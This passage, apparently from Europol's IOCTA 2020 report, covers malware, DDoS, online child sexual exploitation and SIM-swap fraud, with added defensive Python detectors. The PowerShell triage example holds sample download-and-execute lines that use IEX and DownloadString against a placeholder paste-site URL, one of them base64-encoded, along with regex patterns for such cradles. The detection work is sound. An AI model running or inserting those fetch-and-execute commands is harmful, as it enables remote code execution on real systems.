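    The baseline is per host, so a busy file server and a quiet workstation
    are each judged against themselves; `min_history` days are required
    before alerting so the first days of telemetry do not fire. Destinations
    first seen on the flagged day are listed because a new bulk destination
    is the usual exfiltration tell."""
    bytes_by_day, dests_by_day = daily_egress(flows)
    alerts = []
    for host, days in bytes_by_day.items():
        ordered = sorted(days)
        seen_dests = set()
        for i, day in enumerate(ordered):
            history = [days[d] for d in ordered[:i]]
            if len(history) >= min_history:
                baseline = median(history)
                if days[day] > factor * baseline:
                    alerts.append({
                        "host": host,
                        "day": day,
                        "bytes": days[day],
                        "baseline_bytes": baseline,
                        "ratio": round(days[day] / baseline, 1),
                        "new_destinations": sorted(dests_by_day[host][day] - seen_dests),
                    })
            seen_dests |= dests_by_day[host][day]
    return sorted(alerts, key=lambda a: (a["host"], a["day"]))


if __name__ == "__main__":
    for alert in find_egress_anomalies(SAMPLE_FLOWS):
        print(f"{alert['host']} {alert['day']}: {alert['bytes']:,} B out, "
              f"{alert['ratio']}x baseline, new destinations {alert['new_destinations']}")
```

A median rather than a mean is used for the baseline so that one earlier spike (a legitimate backup, say) does not lift the threshold and hide the next one. On real flow data the same logic runs per host and per destination with a longer history window, and the alert is most useful when the flagged day precedes any encryption activity, which is exactly the window the section describes.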
2.3 MALWARE

Besides ransomware, European law enforcement reported malware in the broader sense to be widely present in cybercrime cases. Criminals have converted some traditional banking Trojans into modular malware that covers a broader scope of PC digital fingerprint collection and is sold to cover different needs (e.g. droppers, exfiltration, etc.). These advanced forms of modular malware are a top threat in the EU. According to European law enforcement, incidents have been steadily increasing over the past year and are likely to rise significantly later in 2020. Malware typically includes Trojans and remote access tools (RATs), which allow criminals to gain remote control over infected computers. Some threat actors use techniques similar to those of the past, in some cases resurrecting old exploit code when taking advantage of security hygiene issues, such as the targeting of unpatched structured query language (SQL) vulnerabilities, making traditional attack methods still worthwhile.

The level of complexity varies across malware attacks. Several groups have proven more adaptive and capable than others. Some groups can utilise malware to attack higher-value targets with a more targeted approach, performing research and reconnaissance on their victims, whereas other, less experienced actors engage in lower-impact, massive attacks.

Malware attacks have been targeting third-party providers

Malware attacks on organisations that play a crucial role in the supply chains of major organisations have been a significant development over the past year. Similarly to ransomware, other forms of malware targeting third-party or outsourced service providers put supply chains at significant risk, as the impacts of such attacks could involve data leaks or major disruptions, as well as knock-on or cascading effects. Private sector respondents reported a growing number of attacks on third-party service providers; however, it is unclear whether attackers intended to impact the supply chain in all cases.

Ransomware case example
Criminals targeted the London-based foreign currency exchange Travelex with Sodinokibi ransomware in the first weeks of 2020. The company had over 1 000 stores and 1 000 ATMs in over 26 countries. Travelex was also a third-party service provider for several well-known financial institutions internationally. As the attack left Travelex’s services disrupted for several weeks, this had varying impacts across the whole supply chain. The criminals encrypted Travelex’s data and allegedly managed to exfiltrate five gigabytes of sensitive data from Travelex, including personal data, social security numbers, dates of birth and payment card information, which they subsequently threatened to make public if Travelex did not pay the ransom. The company managed to restore its operations soon after, but it was reported that Travelex paid the USD 2.3 million ransom to the attackers. It is not advisable for victims to pay the ransom, as there is no guarantee that the victim will get their data back, nor that similar attacks will not happen in the future.
In one case, a private sector respondent reported that one of their third-party service providers had been targeted by Emotet malware, which led to a high-risk situation at the respondent’s organisation. Attackers were carefully studying old email threads between the targeted company and the respondent, trying to embed themselves naturally into the conversation using highly tailored messages to gather information. Staff at the respondent’s organisation grew suspicious when new names and email addresses were following up on months-old threads, and so they reported the messages as suspicious. This case shows that threat actors put considerable effort and preparation into an attack.

Emotet leads the way as the benchmark of modern malware as malware variants evolve

The evolution of Emotet and Trickbot malware shows how adaptive the malware threat is. The Emotet banking Trojan – which is mentioned as the top malware threat affecting the EU by both Member States and private sector respondents – has been used by cybercriminals to deliver other malicious payloads such as Ryuk ransomware and Trickbot. The developers behind Trickbot added a ‘Trickbooster botnet’ (a spam booster) to the malware. These developments signal an evolution in the malware and its capabilities.

Emotet is highly professional and aggressive as it seeks to maximise its profits. Private sector respondents suggest Emotet is a benchmark for modern malware, with over 200 000 unique versions observed globally. The group behind Emotet seems to take long breaks over the summer, and when they return in the autumn they become highly active again. Other top malware threats affecting Europe as reported by private sector respondents include Lokibot, which steals login credential information from web browsers and data related to cryptocurrency wallets, and Qakbot, another modular banking Trojan known to facilitate ransomware infections on corporate networks.

European law enforcement case study
European law enforcement have witnessed some perpetrators using trusted third-party services in their malware attacks, including Amazon Web Cloud and Google Drive. The most downloaded PowerShell scripts come from online text paste tools, such as Pastebin. These scripts are then executed in memory, making forensic analysis more difficult (what is known as file-less malware). Using phishing emails or malware payloads, threat actors are using the legitimacy of these services to trick their users. While this modus operandi has been around for a few years already, 2019 saw a significant development. Cybercriminals hack legitimate sites (for example those run on WordPress) to house various payloads and malware, using them as ‘stagers’ to upload malware and phishing sites within them.
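The file-less technique described in the ransomware section (payloads placed straight into memory, leaving nothing on disk) and the case study above (PowerShell scripts fetched from paste sites and executed in memory) leave little for disk forensics, but both leave the command text in PowerShell script-block logging if it is enabled. The Python triage below is an added example and is not from the report or from any law enforcement tool; the log entries, host names and paste URLs are constructed (EXAMPLEID stands in for a paste identifier), and the severity scheme is an assumption. It decodes base64 -EncodedCommand payloads before scanning, because that is the usual way the indicators are hidden.

```python
"""Triage PowerShell script-block log text for the in-memory download-and-run
pattern: a download cradle, an in-memory execution verb, a paste-site URL and
base64 -EncodedCommand payloads, which are decoded and re-scanned."""
import base64
import re


def _encode_ps(command: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE command text; used here only
    to build one constructed sample entry."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed script-block log entries (host, script text); no real hosts,
# URLs or payloads. EXAMPLEID placeholders stand in for paste identifiers.
SAMPLE_SCRIPT_BLOCKS = [
    ("ws-fin-03", "Get-ChildItem C:\\Reports | Where-Object Length -gt 1MB"),
    ("ws-fin-07", "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLEID')"),
    ("ws-fin-09", "powershell -nop -w hidden -EncodedCommand "
                  + _encode_ps("Invoke-Expression (Invoke-WebRequest 'https://pastebin.com/raw/EXAMPLEID2').Content")),
    ("ws-fin-11", "Invoke-WebRequest https://intranet.example/patch.msi -OutFile C:\\Temp\\patch.msi"),
]

CRADLE = re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient")
IN_MEMORY = re.compile(r"(?i)\bIEX\b|Invoke-Expression")
ENCODED = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
PASTE_SITES = ("pastebin.com",)  # the site named in the report; extend from your own telemetry


def expand_encoded(text):
    """Return the script text with every -EncodedCommand payload decoded and
    appended, so indicators hidden behind base64 are scanned like plain text."""
    parts = [text]
    for m in ENCODED.finditer(text):
        try:
            parts.append(base64.b64decode(m.group(1)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return "\n".join(parts)


def assess(host, script_text):
    """Score one log entry. A cradle combined with in-memory execution is the
    file-less pattern; a paste-site URL on top of that makes it high severity.
    A cradle alone (e.g. an admin fetching an installer to disk) is low."""
    text = expand_encoded(script_text)
    reasons = []
    if CRADLE.search(text):
        reasons.append("download cradle")
    if IN_MEMORY.search(text):
        reasons.append("in-memory execution")
    if any(site in text.lower() for site in PASTE_SITES):
        reasons.append("paste site URL")
    if ENCODED.search(script_text):
        reasons.append("encoded command")
    if "download cradle" in reasons and "in-memory execution" in reasons:
        severity = "high" if "paste site URL" in reasons else "medium"
    elif reasons:
        severity = "low"
    else:
        severity = None
    return {"host": host, "severity": severity, "reasons": reasons}


def triage(entries):
    """Return only the entries worth an analyst's time, highest severity first."""
    rank = {"high": 0, "medium": 1, "low": 2}
    findings = [assess(host, text) for host, text in entries]
    return sorted((f for f in findings if f["severity"]), key=lambda f: rank[f["severity"]])


if __name__ == "__main__":
    for f in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"{f['host']}: {f['severity']} ({', '.join(f['reasons'])})")
```

The decode step matters more than the regexes: without it the third entry would score only as "encoded command", and a rule that fires on every encoded command is noisy in environments where management tooling uses it legitimately. Script-block logging has to be switched on for this data to exist at all, which is the control the case study implicitly asks for.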
Crime-as-a-Service (CaaS) enhances the reach of attacks

Prolific malware, which criminals turn into commodity malware for others to use, is cause for concern. Threat actors collude with one another by sharing infrastructure, services and compromised credentials. Commodity malware and Malware-as-a-Service (MaaS) lower the barriers for threat actors wanting to engage in cyber-attacks.

Despite a substantial decrease in exploit kits on underground markets, prolific malware such as Emotet and Trickbot have successfully filled the void. Both Emotet and Trickbot use modular structures to enable reselling and renting sections of their malware to their rivals without compromising their key differentiators. “TrickBot likely is operated by a single group as a MaaS platform that caters to a relatively small number of top-tier cybercriminals. Available information leads us to believe that individual TrickBot campaigns can be attributed to these different customers using the group tag parameter, and each customer may bring their own tactics, techniques and procedures and engage in highly targeted attacks30.”

By doing the heavy lifting in acquiring access to a target’s systems, Emotet can provide Access-as-a-Service (AaaS) to other cybercriminals. These other criminals can focus on monetising the opportunity with some other second-stage malware. Competing solutions for electronic skimming (e-skimming) and JavaScript skimmers, with varying capabilities, each with the goal of compromising online merchant websites by harvesting payment card data, have also been offered as a service on the Darkweb by cybercriminals. These will be elaborated further in Chapter 4.

Simultaneously, European law enforcement has reported a rise in less tech-savvy cybercriminals in the context of widely available CaaS solutions. There has been an observable shift from what used to be a business for threat actors to what is now more of an enterprise. Where specialist skills are needed (e.g. malware coding, malware distribution), criminals are able to hire developers or consultants to fill this need. This highlights increased professionalisation in the cybercrime threat landscape.

Through using combination attacks, criminals effectively challenge law enforcement’s capacity to investigate incidents and attribute attacks to specific perpetrators and crime groups. Malware combinations add layers of complexity to law enforcement investigations. Encryption also presents a challenge, as malware developers often use encryption to frustrate law enforcement and industry efforts to analyse the functionality of malware and assign attribution to specific crime groups.

Mobile malware remains relatively stable

As more and more cashless payment transactions have emerged in the mobile scene, mobile threats such as mobile malware targeting cashless payment methods continue to grow. Mobile malware has yet to reach scalability as a sustainable business for cybercriminals, at least when contrasted with traditional banking Trojans. This is likely due to the limited transactions (with a cap typically set at around €50) which are enabled with mobile payments. Launching mobile malware attacks requires significant effort compared to other attack varieties which further offer larger payouts, which means they are likely conducted by less well-funded, amateur actors. European law enforcement also detected the first signs of mobile payment fraud with attempted fraudulent transactions using app-based systems. Investigations are underway and it is currently unclear whether this involved mobile malware.
_32 IOCTA 2020 Cyber-dependent crime

2.4 DDoS

In 2019, the DDoS attack celebrated its 20th anniversary. Ongoing investigations show that the DDoS threat is still prevalent in the cyber landscape. However, this topic has also had several success stories in prevention, mitigation and investigation. Attackers have adapted to these security measures by using attacks more efficiently, using both new tools and reigniting old techniques, and targeting more vulnerable victims.

Different types of attacks witnessed

Private sector and Member States respondents observed several phenomena relating to DDoS attacks over the past year. Private sector respondents reported seeing an increase in massive and simple DDoS attacks. European law enforcement did not witness significantly impactful attacks in 2019 but reported two kinds of attacks: targeted attacks which aim to damage specific industries or information systems; and crimes using automated tools. Automated attacks have been growing over the past year and are likely connected to CaaS. Threat actors can purchase pre-existing automated tools and deploy them for their own purpose, which makes conducting a DDoS attack a relatively cheap and easy way of carrying out an attack for threat actors who may have limited skills or experience in engaging in cybercrime. Moreover, criminals can use DDoS as a decoy or smokescreen for a more targeted attack.

Additionally, old DDoS methods are still prevalent. European law enforcement observed attacks targeting telecommunications and technology firms, where, in some cases, DDoS attackers threatened companies with reputational harm and extorted them for payment. Law enforcement agencies also came across cases where threat actors engaged in small attacks against larger organisations, extorting them for money with the threat of conducting larger attacks. Some threat actors targeted public systems and websites with DDoS attacks; however, these attacks were difficult to attribute to anyone specifically. One reason for the change in DDoS attacks could be the increase in protective measures used by organisations against them.

With respect to 2020, Amazon said its Amazon Web Services Shield service mitigated the largest DDoS attack ever recorded, stopping a 2.3 terabyte attack in February 2020[31].

DDoS has become increasingly adaptive

Cybercriminals who engage in DDoS attacks have adapted against increasingly robust protection measures. Instead of targeting high-value targets with massive volume attacks, attackers have shifted their focus to smaller organisations with a less mature security apparatus. Downscaling their targets enables attackers to utilise volume more efficiently, and ensures maximum payout when the attacks are financially motivated. For example, private sector respondents reported smaller volume attacks which are capable of blocking smaller data centres. Small requests from 700 IP addresses make it difficult to block a DDoS attack, and difficult for investigators to trace the attacker responsible, as the attack comes from multiple IP addresses. These attacks incorporated additional methods which allowed the attackers to bypass the firewall’s operational capacity.

Law enforcement case study

Law enforcement caught wind of a DDoS attack targeting a Finnish-based company. When approached by law enforcement, however, the company did not agree with the assessment, denying they were under attack. The attackers had used network mirroring DDoS via the Finnish company to amplify their attack on a major casino service in Southern Europe, which was the real target of the attack. Law enforcement thought that the Finnish company was the target; however, the attackers were only utilising the company’s large network for mirroring and thus adding more volume to their actual DDoS attack. This is an old technique which has resurfaced after a few years, however with increased volume and capabilities. European law enforcement observed a couple of these cases.

IoT and DDoS

Connected devices, also known as the Internet of Things (IoT), are an additional avenue for DDoS attacks. According to private sector respondents, connected devices which run on legacy operating systems or which have weak or non-existent password protection could be vulnerable to DDoS attacks or to criminals wanting to provide DDoS services for other criminals, particularly as connected devices could be used for lateral movement to infiltrate other networks. Private sector respondents also observed IoT botnets emerging, and while these have been mostly experimental, not yet witnessed in use for specific scenarios, criminals may advertise these for DDoS attacks.

The threat potential of DDoS attacks is higher than its current impact in the EU

Private sector respondents raised the concern of threat actors targeting third-party service providers with their attacks, for example energy and telecommunication providers. If attackers managed to bring down organisations in these sectors, criminals could potentially gain access to other valuable targets. Third-party service provider targeting could have significant knock-on and cascading impacts in the supply chain. For example, the high level of interconnectivity in the financial industry also makes it vulnerable to disruptions.
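The two DDoS patterns the section describes from the defender's side are (a) a network being used as a "mirror" to amplify traffic against a third party, as in the Finnish case study, and (b) small requests from hundreds of distinct addresses that are hard to block individually. The following is an added example, not code from the IOCTA report or any vendor, that runs both checks over NetFlow-style records. The record format (`src dst proto sport dport bytes`), the internal address range `10.0.0.0/8`, the thresholds and every sample record are constructed assumptions.

```python
"""Reflector-abuse and distributed-source detection over flow records.

Added example, not code from the IOCTA report. The flow records below are
constructed; INTERNAL, the thresholds and the record format are assumptions.
Format per line: src dst proto sport dport bytes
"""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("10.0.0.0/8")  # assumed address space of the monitored network


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str
    sport: int
    dport: int
    nbytes: int


def parse_flows(text):
    """Parse whitespace-separated flow records into Flow objects."""
    flows = []
    for line in text.strip().splitlines():
        src, dst, proto, sport, dport, nbytes = line.split()
        flows.append(Flow(src, dst, proto, int(sport), int(dport), int(nbytes)))
    return flows


def find_reflectors(flows, min_hosts=3, min_ratio=5.0):
    """Flag external addresses that receive far more bytes from many of our
    hosts than they send us: the signature of our network being used as an
    amplifier against a spoofed victim address (the 'mirroring' case study)."""
    out_bytes, in_bytes, senders = defaultdict(int), defaultdict(int), defaultdict(set)
    for f in flows:
        src_internal = ip_address(f.src) in INTERNAL
        dst_internal = ip_address(f.dst) in INTERNAL
        if src_internal and not dst_internal:
            out_bytes[f.dst] += f.nbytes
            senders[f.dst].add(f.src)
        elif dst_internal and not src_internal:
            in_bytes[f.src] += f.nbytes
    alerts = []
    for ext, sent in out_bytes.items():
        received = in_bytes.get(ext, 0)
        ratio = sent / received if received else float("inf")
        if len(senders[ext]) >= min_hosts and ratio >= min_ratio:
            alerts.append((ext, len(senders[ext]), sent, received))
    return alerts


def find_distributed_floods(flows, min_sources=100, max_bytes=200):
    """Flag destinations hit by small requests from many distinct sources:
    the low-volume, many-address pattern respondents reported."""
    sources = defaultdict(set)
    for f in flows:
        if f.nbytes <= max_bytes:
            sources[f.dst].add(f.src)
    return {dst: len(s) for dst, s in sources.items() if len(s) >= min_sources}


def build_sample():
    """Constructed records covering the three situations the functions separate."""
    lines = []
    # 1) Reflection: small UDP/123 requests arrive 'from' 203.0.113.10 (a spoofed
    #    victim address) and four internal hosts answer with 3000-byte responses.
    for i in range(1, 5):
        host = f"10.0.1.{i}"
        lines.append(f"203.0.113.10 {host} udp 40000 123 60")
        lines.append(f"{host} 203.0.113.10 udp 123 40000 3000")
    # 2) Ordinary HTTPS session: bytes flow both ways from a single internal host.
    lines.append("10.0.2.7 198.51.100.5 tcp 51234 443 1500")
    lines.append("198.51.100.5 10.0.2.7 tcp 443 51234 900")
    # 3) Distributed low-volume flood: 120 sources, 80-byte requests, one target.
    for i in range(1, 121):
        lines.append(f"192.0.2.{i} 10.0.5.5 tcp 40000 443 80")
    return "\n".join(lines)


SAMPLE = build_sample()

if __name__ == "__main__":
    flows = parse_flows(SAMPLE)
    print("reflector abuse:", find_reflectors(flows))
    print("distributed floods:", find_distributed_floods(flows))
```

The reflector check keys on the asymmetry rather than on volume: an address that many internal hosts answer at fifty times the byte count it sends is being amplified against, whether or not the total looks like an attack to the organisation in the middle, which is exactly why the Finnish company in the case study did not believe it was involved.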

3 CRIME PRIORITY

Child sexual exploitation online

KEY FINDINGS

• The amount of online CSAM detected continues to increase, further exacerbated by the COVID-19 crisis, which has serious consequences for the capacity of law enforcement authorities.

• The use of encrypted chat apps and industry proposals to expand that market pose a substantial risk for abuse and make it more difficult for law enforcement to detect and investigate online CSE activities.

• Online offender communities exhibit considerable resilience and are continuously evolving.

• Livestreaming of child sexual abuse continues to increase and became even more prevalent during the COVID-19 crisis; a recent case shows CSAM production also takes place in the EU.

• The commercialisation of online CSE is becoming a more widespread issue.

3.1 INTRODUCTION

The main threats related to online CSE have remained relatively stable over recent years and throughout 2019. However, the COVID-19 pandemic has somewhat shifted this assessment. Detection of online CSAM was already increasing on a year-to-year basis, but saw a sharp spike during the peak of the crisis. A surge in the exchange of online CSAM occurred during the contact and travel restrictions and the consequences of this may have a long-term impact on CSE in general.

3.2 THE AMOUNT OF ONLINE CHILD SEXUAL ABUSE MATERIAL CONTINUES TO INCREASE

The year-on-year increase of detected online CSAM has continued. Law enforcement authorities in the EU see themselves confronted with an overwhelming amount of online CSAM to the extent that it becomes unmanageable for many of the units dealing with this crime. This includes regular complaints requiring investigation, including production of CSAM through rape and sexual assault, possession of that material, grooming, sexual coercion and extortion, but also referrals from the National Center for Missing and Exploited Children (NCMEC), ISPs, and hotline reports. This ongoing increase reflects a continuous distribution and redistribution of CSAM content. The effect of this on victims is significant and ongoing[32]. An international survey carried out by the Canadian Centre for Child Protection revealed that 70% of victims feared being recognised in public as a result of their involuntary participation in the offences against them[33].

The COVID-19 crisis revealed an extra surge in online distribution of CSAM. Referrals from the public, and industry in third-party countries reached record highs during the peak months of the pandemic. EU Member States also reported an increase in the number of blocked attempts to access websites featuring CSAM during their lockdowns. Moreover, several EU Member States have reported an increase in detected CSAM activity on Peer-to-Peer (P2P) networks, especially in the second half of March, when lockdowns in EU Member States started materialising[34].

The increase in online CSAM has serious consequences for the capacity of law enforcement authorities to follow up and investigate reports of online CSE. Many investigators in EU Member States are faced on a daily basis with the task of making impossible choices between investigating one report instead of another.

There might be several reasons behind the growing amount of detected CSAM, including more offenders or better detection mechanisms. At least some of the CSAM is being repeatedly uploaded and widely distributed. However, the harm resulting from being a victim of this is severe, as victims experience repeat victimisation every time a picture or video is shared[35].

One of the drivers of the continuous growth of online CSAM is the growth in self-produced material. Especially during COVID-19 related lockdowns, children spent more time online, sharing images and videos that subsequently ended up with CSE offenders.

[Infographic: Child sexual exploitation during the COVID-19 crisis. Indicators shown: speculations amongst offenders about online activity of children; reports from the public; volume of new posts in online forums; downloads on P2P sharing networks; attempts to initiate online contact with children.]

3.3 CRIMINALS INCREASINGLY ENCRYPT THEIR COMMUNICATIONS, COMPLICATING INVESTIGATIONS

Offenders keep using a number of ways to disguise online CSAM, making it more complicated for law enforcement authorities to detect such images and videos. Although P2P network sharing remains among the most popular ways for perpetrators to share CSAM, it appears to be declining in popularity. The use of proactive EMPACT preventive and educative campaigns such as Police2Peer[36] seems to have had a continuing impact on reducing demand through these networks over time. One-to-one distribution and sharing among larger groups routinely takes place on social networking platforms and widely used encrypted communication applications such as WhatsApp, a trend reflected by the increasing number of referrals from US service providers via NCMEC[37].

Increased encryption of many digital communication channels means it is becoming more and more challenging for law enforcement agencies to investigate these crimes. There is increased activity on encrypted communication platforms beyond Tor, making it difficult to detect and investigate online CSE activities, including the creation and distribution of material, online grooming, sexual coercion and extortion.

Perpetrators have been using encrypted communications for a long time, but now even less tech-savvy offenders can easily use encryption. While the development of encrypted messaging platforms is not something bad in itself, it does raise significant obstacles for investigations in this crime type. Additionally, the conversion of popular unencrypted chat applications to encrypted status poses a substantial risk of increased abuse of those platforms for the exchange of CSAM and communication between offenders[38]. Several platforms including Facebook have reported a significant amount of CSAM. If these platforms move to implement end-to-end encryption for their messenger, concerns will rise over their continued ability to identify CSAM on their own platforms.

International police cooperation leads to the arrest of a Darkweb child sex abuser in Spain

The operation to bring down a child sex abuser, who had made explicit videos of an underage boy, owes its success to international cooperation. Information from Queensland Police – Australia’s Taskforce Argos, sent via Europol’s secure communication channel – allowed Europol experts to carry out operational analysis, which revealed that a video from 2015 found in Belgium and France may have been filmed in Spain.

The analysis of the images and video – which showed how the suspect abused a boy who was under five years old at the time – led the Spanish National Police to locate the suspect. When looking into the message published with the video, officers noticed that the suspect used words and phrases from Spain and not from a Latin American country.

Using operational analysis, open-source enquiries and cross-checking information, Europol experts found that the suspect was registered on several websites and boards dedicated to child sexual abuse and exploitation on the Darkweb. The investigation revealed that the suspect was also using a social media network where he was in touch with a woman who shared the same surname as the one in the title of the sexual abuse video.

Once the abuser was located in Barcelona, cybercrime experts from the Spanish National Police Central High-Tech Crime Unit located in Madrid moved to Barcelona. Due to the lockdown in Spain, they were assisted remotely by other experts in Madrid. The material seized showed how the arrested suspect was using several email addresses and Darkweb access points to commit this crime[39].

3.4 DARKWEB OFFENDER COMMUNITIES ARE CONTINUOUSLY EVOLVING

Online offender communities exhibit considerable resilience in response to operational activities carried out by law enforcement agencies, attacks by unidentified actors and losses of staff and platforms. Their reactions include resurrecting old communities, establishing new communities, and making strong efforts to organise and administer them.

Parallel to the activity of large offender communities through Darknet forums is a development involving smaller communities sharing CSAM directly with each other via encrypted messaging platforms. Following several high-profile law enforcement operations on the Darkweb, many offenders seem to believe they are more secure in such small networks, sometimes based on invite-only. Offenders are also known to have used encrypted communication channels to infiltrate existing child-aged groups and form break-off groups involving children and adults[40].

In response to law enforcement operations targeting these Darkweb communities and due to the need to select participants and ensure exchanges of information are strictly related to child sexual abuse, offenders tightly control their communities. They use Darkweb forums as meeting places where participation is structured similarly to criminal organisations, with affiliation rules, codes of conduct, division of tasks and strict hierarchies. The purpose of the structure is to enforce rules and promote individuals based on their contribution to the community, which they do by recording and posting their abuse of children, encouraging others to abuse and providing like-minded, technical and practical support to one another.

Administrators require strict observance of the rules to avoid being banned from the forum. In addition, compliance with the rules and active participation can lead to a progressive increase in rank. Users regularly publish information and safety manuals aimed at avoiding detection by law enforcement authorities. Some users are also attentive to law enforcement operations and regularly publish news articles or even summary reports of the techniques used during successful operations. Cross-posting of such advice across various boards and forums highlights a collective approach to improve operational security for all. Some of these communities also meet offline, sometimes travelling great distances and bringing physical hard drives as storage media with them. Whereas Darkweb communities and real-life child sexual abusers used to be relatively separate, there appear to be more hands-on abusers – including individuals travelling for live distant child abuse – who are also very active on the Darkweb. Some law enforcement agencies have had cases where offenders keep material they produced themselves with them for many years before uploading it to the internet, hoping to avoid victim identification. This illustrates the crucial importance of victim identification efforts by law enforcement agencies, such as the Victim Identification Taskforce (VIDTF) organised on a regular basis by Europol.

Ninety suspects identified in major online child sexual abuse operation

Police around the world have taken down a global child abuse ring with links to over forty countries through a Belgian investigation supported by Europol. Four suspects have been convicted by a Belgian court. This case was sparked by the Belgian East Flanders Federal Judicial Police, after more than nine million pictures and videos of the abuse of thousands of children from around the world were found there during a house search.

The vast majority of this footage had never been seen in circulation before by law enforcement. Suspecting they were producing their own, the Belgian investigators launched operation Gargamel together with Europol across Europe and beyond. The image and video data seized during this investigation has been used for Victim Identification Task Forces hosted by Europol, through which seventy children and thirty suspects have been identified. The Belgian Federal Judicial Police succeeded in identifying 60 suspects (of which 24 in Belgium) and 40 victims, which brings the actual total to ninety suspects and 110 victims.

Some suspects have already appeared before court in a number of other countries. In Australia, a suspect was sentenced to 15 years in prison. More arrests and rescues are expected globally as police in over 40 countries examine the intelligence packages compiled by Europol and information from the Belgian Federal Judicial Police[43].

3.5 LIVESTREAMING IS BECOMING MAINSTREAM

Livestreaming of child sexual abuse continues to increase, becoming even more popular than usual during the COVID-19 crisis, when travel restrictions prevented offenders from physically abusing children[41]. As offenders had fewer opportunities to engage in physical CSE, live streaming emerged as a viable alternative to hands-on child sexual abuse. In some cases, video chat applications with built-in payment systems are used. This is a complicated area for law enforcement investigations, as usually none of the material is recorded, except for occasional chat conversations.

The Philippines remains the main country where live distant child abuse (LDCA) takes place. Cases of online CSE in the Philippines surged during the COVID-19 crisis, as the lockdown meant already poor families struggled to generate income and children did not go to school[42]. However, this year has further confirmed that this type of online CSE is not limited to Southeast Asian countries. A large operation in Romania uncovered significant levels of livestreaming taking place within the country, demonstrating that the EU is not immune to this threat.

In some cases, those seeking live streams of CSE are deceived: they pay for a live stream, but never receive anything.

3.6 COMMERCIALISATION OF ONLINE CSE IS AN EMERGING THREAT

Last year’s IOCTA reported that commercialisation of CSAM remained limited to LDCA[44]. However, the past year has brought to light a number of indications that the commercialisation of online CSE is becoming a more widespread issue. For a long time, online CSE was one of the few crime areas Europol focused on that was not primarily driven by financial gain. Although offenders are still primarily driven by a desire to obtain more CSAM, in some cases they do seek to profit from online CSE. The emergence of a profit-driven model in this crime area is a worrisome development.

The monetisation of content has been seen on both the Clearnet and the Darknet, with many links on the dark web referring to Clearnet resources. Individuals monetise CSAM by uploading material to hosting sites (including legitimate hosting services) and subsequently acquiring credit on the basis of the number of downloads. This credit can be used to pay for additional hosting or in some instances can be cashed out, either in cryptocurrencies or by other means. LDCA has had a commercial element for a longer time, as offenders frequently pay to watch parents, carers and offenders abuse children remotely to order. Uploading CSAM to legitimate hosting services is another method of monetising CSAM. The platform used to download this material may not be aware of the content or can claim not to be aware. The hosting site’s advertising and the potential profits per click are also increased through such models.

[Infographic: online risks for children. Items shown: sexual coercion and extortion; sexting; games with gambling-like elements; making explicit material; bullying; accessing pornography and violent content online; costs of in-game spending; grooming.]

3.7 ONLINE CHILD SEXUAL ABUSE TO REMAIN SIGNIFICANT THREAT

Online child sexual abuse remains a significant threat. The situation with COVID-19 has increased the time people spend online, whether it is for remote working, remote schooling or spare time. Children who spend a lot of time online unsupervised are therefore much more exposed to potential offenders through online gaming, the use of chat groups in apps, phishing attempts via email, unsolicited contact on social media as well as through less secure online educational applications[45]. Additionally, unsupervised time online further increases the risk of producing and distributing self-generated indecent material among underage individuals, which could also eventually reach child sex offenders. Furthermore, child sex offenders could take advantage of lonely and isolated children online, connecting with them to produce explicit material or to arrange a meeting in real life[46]. The current situation regarding COVID-19 creates considerable levels of uncertainty and unpredictability for the foreseeable future. The developments around the pandemic and related lockdowns and travel restrictions will have a big influence on the developments regarding online CSE.

The growth in CSAM being detected is showing no signs of stabilising, let alone decreasing. The end of the current health crisis and the lifting of lockdown measures may result in an increased number of reports of CSE, as abuse that occurred during the COVID-19 pandemic may be reported to law enforcement or other authorities after the fact. It is highly likely that in the upcoming year there will be a sharp increase in the amount of self-produced indecent material, which might also lead to a corresponding increase in online solicitation and exploitation.

Travel restrictions and other measures during the pandemic have likely prevented offenders from travelling and so have shifted their focus further to the exchange of CSAM online. A relaxation of travel restrictions and opening up of air travel will likely lead to an increase in transnational offenders seeking out CSE in certain countries and regions. If air travel remains limited for the foreseeable future however, or becomes more expensive, it is also possible we will see an increase in proxy offending both with surrogates such as childlike sex dolls or via live streaming.

4 CRIME PRIORITY

Payment fraud

KEY FINDINGS

• SIM swapping is a key trend that allows perpetrators to take over accounts and has demonstrated a steep rise over the last year.

• BEC remains an area of concern as it has increased, grown in sophistication, and become more targeted.

• Many law enforcement agencies and financial services identified online investment fraud as one of the fastest-growing crimes, generating millions of losses and affecting thousands of victims from all EU countries.

• CNP fraud continues to increase as criminals diversify in terms of target sectors and e-skimming modi operandi.

4.1 INTRODUCTION

While the majority of fraud types are well known, they enjoy continued success due to insufficient cybersecurity measures and an overall lack of awareness. Fuelled by a wealth of readily available data, as well as a CaaS community, it has become easier for criminals to carry out attacks. As a result, law enforcement and industry continue to identify well-established frauds such as BEC as a major threat, but have also witnessed new key trends such as SIM swapping emerge.

4.2 INCREASE IN SIM SWAPPING AND SMISHING

SIM swapping is one of the new key trends in this year’s IOCTA. This modus operandi garnered considerable attention over the past twelve months, as law enforcement agencies noticed a significant increase with a growing number of cases in Europe.

SIM swapping is a type of account takeover and refers to the circumvention of SMS-based 2FA to access sensitive user accounts. Criminals fraudulently swap or port the victim’s SIM to one in the criminal’s possession in order to intercept the one-time password (OTP) step of the authentication process. Since this typically requires detailed information on the victim, SIM swapping attacks are highly targeted. This also means that the overall volume of cases differs from Member State to Member State, leading to SIM swapping cases causing significantly higher losses in some jurisdictions while it is barely present in others.

Overall, SIM swapping poses a significant concern and huge potential danger and risk. A successful SIM swapping attack can lead to criminals gaining complete control over a victim’s bank, email or social media account, and as a result, enable a number of serious follow-up crimes.

Operation Quinientos Dusim[47]

In January 2020, investigators from the Spanish National Police together with the Civil Guard and Europol targeted suspects across Spain believed to be part of a hacking ring which stole over €3 million in a series of SIM swapping attacks. Law enforcement arrested 12 individuals in Benidorm (5), Granada (6) and Valladolid (1).

